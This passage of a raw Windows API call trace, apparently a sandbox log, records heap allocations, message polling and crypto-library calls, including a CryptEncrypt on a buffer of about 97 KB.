Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0040.361] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.361] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.365] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.365] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.365] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.365] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.365] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.365] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.366] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.366] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.366] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.366] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.366] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.366] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.366] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.366] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.367] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17ce9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17cf0) returned 1 [0040.367] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.367] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.367] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.367] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.367] CharLowerBuffW (in: lpsz="byte[97521]", cchLength=0xb | out: lpsz="byte[97521]") returned 0xb [0040.367] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.370] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.370] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.371] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9649f8*, pdwDataLen=0x6ae220*=0x17ce9, dwBufLen=0x17cf0 | out: pbData=0x9649f8*, pdwDataLen=0x6ae220*=0x17cf0) returned 1 [0040.372] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.372] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.372] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 